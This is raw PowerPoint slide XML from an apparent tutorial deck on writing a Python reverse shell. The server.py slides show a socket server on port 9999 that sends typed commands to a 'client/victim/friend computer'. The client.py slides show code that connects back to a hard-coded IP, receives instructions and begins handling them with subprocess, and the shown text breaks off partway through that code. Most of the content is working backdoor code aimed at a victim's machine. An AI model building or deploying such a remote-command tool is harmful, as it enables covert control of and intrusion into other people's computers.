          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>import socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>import sys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>#Create a Socket to connect two computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>create_socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        global host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        global port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        global s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        host=""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        port=9999 #any unknown popular no can be used as port no</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        s=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>socket.error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        print("Socket creation error "+str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270A484D-EFC7-4B96-B924-B3F965F8007E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250794" y="2368075"/>
            <a:ext cx="6094520" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>bind_socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        global host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        global port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        global s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        print("Binding the Port :"+str(port))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>s.bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>host,port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>s.listen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>(5) #server will continuously listen from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>varioous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t> computers and 5 is the no of bad connections after which it throws error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    except </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>socket.error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        print("Socket Binding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>error."+str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>) + "\n" + "Retrying...")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>bind_socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>() #recursive function calling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>#once connection initiated, accept the connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>socket_accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>conn,address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>s.accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    print("Connection has been established !! "+"IP "+address[0]+ ": Port"+ str(address[1]))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>send_commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>(conn) #to send any command like for making a folder on to your friend or victim computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>conn.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>() #close the connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D53F1774-577F-4247-B911-E7C3AAA6D92E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6571695" y="998517"/>
            <a:ext cx="6094520" cy="5478423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>#Sending Commands to client/victim/friend computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>send_commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>(conn):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>    # to send more than one command use infinite while loop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>    while True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> = input()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        #to stop the infinite loop, we need to quit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> == "quit":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>conn.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>s.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>sys.exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        #to convert any command entered in string format to byte format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>str.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>)) &gt; 0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>conn.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>str.encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>)) # to send commands to another computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>client_response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> = str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>conn.recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>(1024), "utf-8") #whenever data is received from client back, it has to be converted from byte to string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>            print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>client_response,end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>="") #here end parameter gets the cursor to next line after giving output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>def main():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>create_socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>bind_socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>socket_accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>main() #function calling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7BB84CF-0C0C-49FD-8370-3FE3F4A4252C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6345314" y="365126"/>
            <a:ext cx="0" cy="67547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2682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123FA-5923-456D-83BD-7A3D28F6A9D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="587067"/>
            <a:ext cx="10515600" cy="451621"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Client ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C5083C8-7CAF-47F0-A46C-6E57CBA3838A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Functions of client.py :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try and connect to our server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wait for our instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Receives the instructions and run them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take the result and send them back to the server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12955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FB6D-6B13-4BA6-9F01-8D5B76809EED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571870" y="187573"/>
            <a:ext cx="10515600" cy="315912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B6A4670-118F-4F0C-AF52-28FE73A27132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571869" y="689916"/>
            <a:ext cx="8802949" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>import socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>import subprocess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#subprocess is a process exist on windows computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>socket.socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>host="192.168.0.167" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#this IP address is dynamic as it changes whenever we restart our computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>port=9999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#now need to bind them together</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>s.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>host,port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85156E66-91C0-4587-B104-7B5C6D819383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571869" y="2965698"/>
            <a:ext cx="9555332" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#infinite loop for lot of instructions should be sent to client and should be executed by client.py file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>while True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    data = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0" err="1"/>
              <a:t>s.recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>(1024)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#for data check,utf-8 is character format and used to convert data coming from server in byte format to string format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    #and checks for first two character in data is 'cd' after decoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1200" dirty="0"/>
